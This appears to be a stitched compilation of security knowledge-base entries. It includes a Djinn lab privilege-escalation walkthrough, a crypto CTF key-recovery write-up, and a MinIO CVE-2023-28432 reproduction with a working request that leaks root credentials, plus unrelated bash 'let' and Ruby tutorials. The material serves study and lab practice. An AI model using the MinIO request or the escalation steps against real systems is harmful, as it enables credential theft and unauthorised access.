www-data@djinn:/home/nitish/.dev$ ls -al ls -al total 12 drwxr-xr-x 2 nitish nitish 4096 Oct 21 2019 . drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 .. -rw-r--r-- 1 nitish nitish 24 Oct 21 2019 creds.txt www-data@djinn:/home/nitish/.dev$ cat creds.txt cat creds.txt nitish:p4ssw0rdStr3r0n9 ``` 切换到nitish用户 ``` nitish@djinn:~/.dev$ sudo -l sudo -l Matching Defaults entries for nitish on djinn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nitish may run the following commands on djinn: (sam) NOPASSWD: /usr/bin/genie nitish@djinn:~/.dev$ cd .. cd .. nitish@djinn:~$ cat user.txt cat user.txt 10aay8289ptgguy1pvfa73alzusyyx3c ``` 切换到sam用户 ``` nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd id my man!! $ $ id id uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare) $ whoami whoami sam ``` 分析lago,发现输入num既可提权。 ```python strings /root/lago #!/usr/bin/python2 from getpass import getuser from os import system from os.path import isfile from random import randint def naughtyboi(): # TODO: Get some sexy news, if you know what I mean ;-) print("Working on it!! ") def check(path): try: if isfile(path): return True else: return False except Exception: return False def guessit(): num = randint(1, 101) print("Choose a number between 1 to 100: ") try: s = input("Enter your number: ") if s == num: system("/bin/sh") else: print("Better Luck next time") except: print("Slow claps again") def readfiles(): user = getuser() try: path = raw_input("Enter the full of the file to read: ") if check(path): print("User %s is not allowed to read %s" % (user, path)) else: print("Slow clap for this hacker right here") except Exception: print("Slow clap for this hacker right here") def options(): print("What do you want to do ?") print("1 - Be naughty") print("2 - Guess the number") print("3 - Read some damn files") print("4 - Work") try: choice = input("Enter your choice:") except Exception: print("\n") try: choice = int(choice) return choice except Exception: print("Man Stop hacking the damn input menu") def main(op): if op == 1: naughtyboi() elif op == 2: guessit() elif op == 3: readfiles() elif op == 4: print("work your ass off!!") else: print("Do something better with your life") if __name__ == "__main__": main(options()) ``` 提权到root用户 ![image-20230208134915871](../../.gitbook/assets/image-20230208134915871.png)
sec-knowleage
# Simple logic (crypto, 95p, 167 solved) In the challenge we get [source code](encrypt.rb) and some plaintext-ciphertext pairs plus encrypted flag [outputs](output). Encryption ported to python is: ```python def encrypt(msg, key, bits=BITS): enc = msg mask = (1 << bits) - 1 for i in range(ROUNDS): enc = (enc + key) & mask enc = enc ^ key return enc ``` This could have been solved in 2 ways. The lazy way was to put this directly into Z3 and wait a while for it to recover the key using the known pt-ct pairs: ```python def solvez3(): s = Solver() pt = [0x29abc13947b5373b86a1dc1d423807a, 0xeeb83b72d3336a80a853bf9c61d6f254, 0x7a0e5ffc7208f978b81475201fbeb3a0, 0xc464714f5cdce458f32608f8b5e2002e, 0xf944aaccf6779a65e8ba74795da3c41d, 0x552682756304d662fa18e624b09b2ac5] ct = [0xb36b6b62a7e685bd1158744662c5d04a, 0x614d86b5b6653cdc8f33368c41e99254, 0x292a7ff7f12b4e21db00e593246be5a0, 0x64f930da37d494c634fa22a609342ffe, 0xaa3825e62d053fb0eb8e7e2621dabfe7, 0xf2ffdf4beb933681844c70190ecf60bf] key = BitVec('key', 128) for msg, result in zip(pt, ct): s.add(encrypt(msg, key) == result) print(s.check()) model = s.model() return model[key].as_long() ``` But this takes quite some time, so in the meantime we can just solve this directly. The key thing to notice here is that suffix of the encryption result depends only on the suffix of the key, and that we have `odd` number of rounds. Let's assume the key is only 1 bit long. In such case `^` will cause the last bit of the encryption result to flip each round. Of course `+` will have exactly the same result on the last bit, so they will cancel each other -> that's not very interesting. But `+` causes as well overflow into the higher bit if we're adding `1`. So it will flip the second bit each round, assuming there was overflow, and we have `odd number of rounds`. Last bit is preserved by this encryption (as mentioned above `^` cancels `+` on the last bit). Now if we look at the next bit in the plaintext and in the ciphertext we can clearly see if it flipped or not, and this tells us if the last key bit was 0 (no flip) or 1 (flip present). If we try to expand this idea further it becomes a bit cumbersome to track all previous carries, but we don't need to do that by hand. We can simply use the encrypt method assuming another key bit is 0 or 1 and just compare the results from ct-pt pairs we have, to determine which key bit value was the correct one. In each round we encrypt the plaintext data using suffix of the key extended with 0 and then with 1, extract the next bit and compare it with corresponding bit in real cipheretxts. So for recovery of 1st bit we encrypt all plaintexts with keys `0b0` and `0b1` and check in which case second LSB is the same as in result cipheretxts we have. Then we do the same, but we use 1 bit long key, first bit is the real one we recovered above, and next bit is `0` and then `1` and we repeat the whole process. ```python known_key_suffix = 0b0 for recover_bit in range(127): result_test_bit = [bin(result)[-2 - recover_bit] for result in ct] for candidate_prefix in range(2): candidate_key_suffix = known_key_suffix + (candidate_prefix << recover_bit) calculated_test_bit = [bin(encrypt(plain, candidate_key_suffix, recover_bit + 2))[-2 - recover_bit] for plain in pt] if result_test_bit == calculated_test_bit: known_key_suffix = int(bin(candidate_key_suffix)[-(recover_bit + 1):], 2) break ``` And almost immediately we get back the key `62900030173734087782946667685685220617` which we can now use to decrypt the flag `TWCTF{ade4850ad48b8d21fa7dae86b842466d}`
sec-knowleage
# MinIO Information Disclosure in Cluster Deployment (CVE-2023-28432) [中文版本(Chinese version)](README.zh-cn.md) MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. In the version before `RELEASE.2023-03-20T20-16-18Z`, there is an information disclosure vulnerability if MinIO is deployed in cluster mode. An attacker can use an HTTP request to obtain all environment variables of the target process, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`. References: - <https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q> - <https://mp.weixin.qq.com/s/GNhQLuzD8up3VcBRIinmgQ> ## Vulnerable Environment Executing following commands to start a MinIO cluster: ``` docker compose up -d ``` After the cluster has been started, you can browse Web console on `http://your-ip:9001`, API server on `http://your-ip:9000`. ## Vulnerability Reproduce The issue exists in the API endpoint `http://your-ip:9000/minio/bootstrap/v1/verify`. Send the request to retrieve all environment variables: ``` POST /minio/bootstrap/v1/verify HTTP/1.1 Host: your-ip:9000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` ![](1.png) It can be seen that `MINIO_ROOT_USER` and `MINIO_ROOT_PASSWORD` is exposed. Success to use this username and password to login the Web console: ![](2.png)
sec-knowleage
let === 简单的计算器,执行算术表达式。 ## 概要 ```shell let arg [arg ...] ``` ## 主要用途 - 执行一个或多个算术表达式。 ## 参数 arg:算术表达式 ## 返回值 当`let`最后一个执行的表达式的计算结果为0时返回`1`,否则返回`0`。 当`let`执行的表达式的除数为0时,返回`1`并报错。 ## 运算符优先级递减表 |**运算符**|**描述**| |:-------:|:-------:| |```id++, id--```|```变量后增量、变量后减量```| |```++id, --id```|```变量预增量、变量预减量```| |```-, +```|```正号、负号```| |```!, ~```|```逻辑否、按位取反```| |```**```|```幂运算```| |```*, /, %```|```乘法、除法、取余```| |```+, -```|```加法、减法```| |```<<, >>```|```按位左移、右移```| |```<=, >=, <, >```|```比较```| |```==, !=```|```等于、不等于```| |```&```|```按位与```| |```^```|```按位异或```| |```\|```|```按位或```| |```&&```|```逻辑与```| |```\|\|```|```逻辑或```| |```expr ? expr : expr```|```条件运算符(三元运算符)```| |```=, *=, /=, %=, +=, -=,```<br>```<<=, >>=, &=, ^=, \|=```|```赋值```| ## 例子 ```shell # 尝试直接在终端中执行算术表达式(就像在python的IDLE)。 3+4 bash:3+4:command not found... # 换一种方式。 3 + 4 bash:3:command not found... # 看来不行。 ``` ```shell # let命令赋值。 let a=3**4 echo ${a} # 显示81。 # ((...))和let命令等效。 ((a=3**4)) ``` ```shell # let常用于变量赋值,而外部命令expr可直接返回表达式的值。 let 3+4 # 没有显示7。 # 执行后显示7,注意空格。 expr 3 + 4 ``` ```shell # 条件表达式。 if ((8>4)); then echo '8 is greater than 4.' else echo 'error' fi # 注意空格。 if [[ 12 -le 10 ]]; then echo 'error' else echo '12 is greater than 10.' fi ``` ```shell # 可以通过declare命令设置整型属性的方法来进行算术运算。 # local命令与此类似。 # 没有指定整型属性,输出为字符串'a+b'。 declare a=3 b=4 c c=a+b echo ${c} # 不过可以使用以下方式赋值。 c=$((a+b)) echo ${c} # 显示7 # 设置了整型属性就可以直接加了。 declare -i a=3 b=4 c c=a+b echo ${c} # 同上。 declare -i a a=2*3 echo ${a} # 显示6。 ``` ### 注意 1. 该命令是bash内建命令,相关的帮助信息请查看`help`命令。 2. 执行算术计算的命令除了`let`,还有外部命令`expr`、`bc`等。
sec-knowleage
# 对象 - https://www.kancloud.cn/imxieke/ruby-base/107288 --- 假设现在我们用 Ruby 做一个通讯录,通讯录一般有以下项目: - 名字 - 拼音 - 邮政编码 - 都道府县 注:日本的行政区域单位 - 地址 - 电话号码 - 邮箱地址 - SNS 的 URL - 登记日期 这些项目里,邮政编码用 7 位的数字表示,除此以外的项目都是用字符串表示,一般来说,登记日期这个项目应该用 Date 对象来表示。 这样一来,一组的项目集合起来后就可以表示一个人的基本信息,再把亲朋好友的基本信息都收集后就成为一本通讯录。 不同数据间的组合无法用字符串或数值这样简单的对象来表示,因此我们需要一个可以用以表示数据集合的数据结构。 > 像数组、散列这样保存对象的对象,我们称为容器(container)。 ## 数组 数组(array)是一个按顺序保存多个对象的对象,它是基本的容器之一。我们一般称为数组对象或者 Array 对象。 **数组的创建** 要创建数组,我们需要把各数组的元素用逗号隔开,然后再用 `[]` 把它们括起来即可。首先,让我们创建一个简单的数组。 ```ruby names = [" 小林 ", " 林 ", " 高野 ", " 森冈 "] ``` 在这个例子里,我们创建了一个叫 names 的数组对象,分别保存了 4 个数组元素:小林、林、高野、森冈。 **数组对象** 在数组元素对象还未确定的情况下,我们可以用 `[]` 表示一个空数组对象。 ```ruby names = [] ``` **从数组中抽取对象** 保存在数组里的每个对象,都各自有一个表示其位置的编号,我们称之为索引(index)。利用索引,我们可以进行把对象保存到数组、从数组中抽取对象等操作。 要从数组中抽取元素(对象),我们可以使用以下方法。 ```ruby 数组名 [ 索引 ] ``` 如下所示,有一个名为 `names` 的数组对象。 ```ruby names = [" 小林 ", " 林 ", " 高野 ", " 森冈 "] ``` 把 `names` 数组里第一个元素拿出来,我们可以这么做 ```ruby names[0] ``` 因此,若执行以下代码, ```ruby print "第一个名字为:", names[0], "。\n" ``` 得到的结果为, ``` 第一个名字为小林。 ``` 同样地,`names[1]` 表示林,`names[2]` 表示高野。 ```ruby > irb --simple-prompt => names = ["小林", "林", "高野", "森冈"] => ["小林", "林", "高野", "森冈"] >> names[0] => "小林" >> names[1] => "林" >> names[2] => "高野" >> names[3] => "森冈" ``` > 数组的索引值是从 0 开始,并非 1。因此,a[1]返回的并不是数组第一个元素,而是第二个元素。刚接触编程时,大家比较容易弄错(即便是熟悉以后也有可能会犯这样的错误)。大家在使用数组时,务必注意索引值这个特点。 **将对象保存到数组中** 我们可以将新的对象保存到已经创建的数组中。 将数组里的某个元素置换为其他对象,我们可以这样做: ```ruby 数组名 [ 索引 ] = 希望保存的对象 ``` 我们试着置换一下刚才的 names 数组的内容,将 " 测试 " 放在数组首位。 ```ruby names [0] = "测试" ``` 执行下面的程序,我们可以知道 " 测试 " 的确已经被置换为首位的数组元素。 ```ruby > irb --simple-prompt >> names = ["小林", "林", "高野", "森冈"] => ["小林", "林", "高野", "森冈"] >> names[0] = "测试" => "测试" >> names => ["测试", "林", "高野", "森冈"] ``` 在保存对象时,如果指定了数组中不存在的索引值时,则数组的大小会随之而改变。Ruby 数组的大小是按实际情况自动调整的 **数组的元素** 任何对象都可以作为数组元素保存到数组中。例如,我们除了可以创建字符数组,还可以创建数值数组。 ```ruby num = [3, 1, 4, 1, 5, 9, 2, 6, 5] ``` Ruby 数组还支持多种不同对象的混合保存。 ```ruby mixed = [1, " 歌 ", 2, " 风 ", 3] ``` 这里,我们不再举其他例子了,像时间、文件等对象也都可以作为数组元素。 **数组的大小** 我们可以用 size 方法获知数组的大小。例如,若想获知数组 array 的大小,程序可以这么写: ```ruby array.size ``` 我们现在就用 size 方法,查看一下刚才的 names 数组的大小。 ```ruby > irb --simple-prompt >> names = ["小林", "林", "高野", "森冈"] => ["小林", "林", "高野", "森冈"] >> names.size => 4 ``` size 方法的返回值就是数组的大小。 **数组的循环** 有时,我们希望输出所有数组元素,或者对在数组中符合某条件的元素执行 xx 方法,不符合条件的执行 yy 方法。为实现这些目的,我们需要一种方法遍历所有数组元素。 为此,Ruby 提供了 each 方法。我们在第 1 章介绍迭代器时,已经稍微接触了一下 each 方法。 each 方法的语法如下: ```ruby 数组 .each do | 变量 |  希望循环的处理 end ``` each 后面在 `do ~ end` 之间的部分称为块(block)。因此,each 这样的方法也可以称为带块的方法。我们可以把多个需要处理的内容合并后写到块里面。 块的开始部分为 | 变量 |。each 方法会把数组元素逐个拿出来,赋值给指定的 | 变量 |,那么块里面的方法就可以通过访问该变量,实现循环遍历数组的操作。 接下来,我们实际操作一下,按顺序输出数组 names 的元素。 ```ruby > irb --simple-prompt >> names = ["小林", "林", "高野", "森冈"] => ["小林", "林", "高野", "森冈"] >> names.each do |n| ?> puts n >> end 小林 林 高野 森冈 => ["小林", "林", "高野", "森冈"] ``` 每循环一次,就会把当前的数组元素赋值给变量 |n| ## 散列 散列(hash)也是一个程序里常用到的容器。散列是键值对(key-value pair)的一种数据结构。在 Ruby 中,一般是以字符串或者符号(Symbol)作为键,来保存对应的对象. **什么是符号** 在 Ruby 中,符号(symbol)与字符串对象很相似,符号也是对象,一般作为名称标签来使用,用来表示方法等的对象的名称。 创建符号,只需在标识符的开头加上 `:` 就可以了。 ```ruby sym = :foo # 表示符号“:foo” sym2 = :"foo" # 意思同上 ``` 符号能实现的功能,大部分字符串也能实现。但像散列键这样只是单纯判断“是否相等”的处理中,使用符号会比字符串比较更加有效率,因此在实际编程中我们也会时常用到符号。 另外,符号与字符串可以互相任意转换。对符号使用 `to_s` 方法,则可以得到对应的字符串。反之,对字符串使用 `to_sym` 方法,则可以得到对应的符号。 ```ruby > irb --simple-prompt >> sym = :foo => :foo >> sym.to_s # 将符号转换为字符串 => "foo" >> "foo".to_sym # 将字符串转换为符号 => :foo ``` **散列的创建** 创建散列的方法与创建数组的差不多,不同的是,不使用 `[]`,而是使用 `{}` 把创建的内容括起来。散列用 `=>` 来定义获取对象时所需的键(key),以及键相对应的对象(value)。 ```ruby address = {:name => "高桥", :pinyin => "gaoqiao", :postal => "1234567"} ``` 将符号当作键来使用时,程序还可以像下面这么写: ```ruby address = {name: "高桥", pinyin: "gaoqiao", postal: "1234567"} ``` **散列的使用** 从散列取出对象、将对象保存到散列的使用方法也都和数组非常相似。我们使用以下方法从散列里取出对象。 ```ruby 散列名 [ 键 ] ``` 保存对象时使用以下方法。 ```ruby 散列名[ 键 ] = 希望保存的对象 ``` ```ruby > irb --simple-prompt >> address = {name: "高桥", pinyin: "gaoqiao"} => {:name=>"高桥", :pinyin=>"gaoqiao"} >> address[:name] => "高桥" >> address[:pinyin] => "gaoqiao" >> address[:tel] = "000-1234-5678" => "000-1234-5678" >> address => {:name=>"高桥", :pinyin=>"gaoqiao", :tel=>"000-1234-5678"} ``` **散列的循环** 使用 each 方法,我们可以遍历散列里的所有元素,逐个取出其元素的键和对应的值。循环数组时是按索引顺序遍历元素,循环散列时按照键值组合遍历元素。 散列的 each 语法如下。 ```ruby 散列 .each do | 键变量 , 值变量 |  希望循环的处理 end ``` ```ruby > irb --simple-prompt >> address = {name: "高桥", pinyin: "gaoqiao"} => {:name=>"高桥", :pinyin=>"gaoqiao"} >> address.each do |key, value| ?> puts "#{key}: #{value}" >> end name: 高桥 pinyin: gaoqiao => {:name=>"高桥", :pinyin=>"gaoqiao"} ``` 显而易见,程序循环执行了输出散列 address 的键和值的 puts 方法 **正则表达式** 在 Ruby 中处理字符串时,我们常常会用到正则表达式(regular expression)。使用正则表达式,可以非常简单地实现以下功能: - 将字符串与模式(pattern)相匹配 - 使用模式分割字符串 Ruby 的前辈——Perl、Python 等脚本语言至今还在使用正则表达式。Ruby 继承了这一点,把正则表达式的使用嵌入到语法中,大大简化了正则表达式的调用方式。正是在正则表达式的帮助下,字符串处理变成了一个 Ruby 非常擅长的领域。 我们有时会有按照特定模式进行字符串处理的需求,比如“找出包含○○字符串的行”或者“抽取○○和 ×× 之间的字符串”。判断字符串是否适用于某模式的过程称为匹配,如果字符串适用于该模式则称为匹配成功。 像这样的字符串模式就是所谓的正则表达式。 乍一看,“正则表达式”这个词可能会给人一种深奥、难理解的印象。的确,正则表达式非常复杂,但如果只是使用单纯的匹配功能,也并不怎么难。所以大家也无需感到如临大敌,我们暂时只需要知道有个工具叫“正则表达式”就足够了。 创建正则表达式对象的语法如下所示。 ```ruby / 模式 / ``` 例如,我们希望匹配 Ruby 字符串的正则表达式为: ```ruby /Ruby/ ``` 把希望匹配的内容直接写出来,就这么简单。匹配字母、数字时,模式按字符串原样写就可以了。 汉字也可以通过同样的方法做匹配。 我们用运算符 `=~` 来匹配正则表达式和字符串。它与判断是否为同一个对象时用到的 `==` 有点像。 匹配正则表达式与字符串的方法是: ```ruby / 模式 / =~ 希望匹配的字符串 ``` 若匹配成功则返回匹配部分的位置。字符的位置和数组的索引一样,是从 0 开始计数的。也就是说,字符串的首个字符位置为 0。反之,若匹配失败,则返回 `nil。` ```ruby > irb --simple-prompt >> /Ruby/ =~ "Ruby" => 0 >> /Ruby/ =~ "Diamond" => nil ``` 之前曾提到过,使用单纯的字母、数字、汉字模式时,如果字符串里存在该模式则匹配成功,否则匹配失败。 ```ruby > irb --simple-prompt >> /Ruby/ =~ "Yet Another Ruby Hacker," => 12 >> /Yet Another Ruby Hacker,/ =~ "Ruby" => nil ``` 正则表达式右边的 `/` 后面加上 `i` 表示不区分大小写匹配。 ```ruby > irb --simple-prompt >> /Ruby/ =~ "ruby" => nil >> /Ruby/ =~ "RUBY" => nil >> /Ruby/i =~ "ruby" => 0 >> /Ruby/i =~ "RUBY" => 0 >> /Ruby/i =~ "rUbY" => 0 ``` # nil 是什么 nil 是一个特殊的值,表示对象不存在。像在正则表达式中表示无法匹配成功一样,方法不能返回有意义的值时就会返回 nil。另外,从数组或者散列里获取对象时,若指定不存在的索引或者键,则得到的返回值也是 nil。 ```ruby > irb --simple-prompt >> hash = {"a"=>1, "b"=>2} => {"a"=>1, "b"=>2} >> hash["c"] => nil ``` if 语句和 while 语句在判断条件时,如果碰到 false 和 nil,则会认为是“假”,除此以外的都认为是“真”。因此,除了可以使用返回 true 或者 false 的方法,也可以使用“返回某个值”或者返回“nil”的方法作为判断条件表达式。
sec-knowleage
import string, hashlib s=open("re400.bin").read().strip().decode("hex")[::-1] lasthi=2 res="" for c in s: hi=ord(c)>>4 res+=chr(ord(c)^((hi^lasthi)<<4)) lasthi=hi print res print hashlib.md5(res[1:]).hexdigest()
sec-knowleage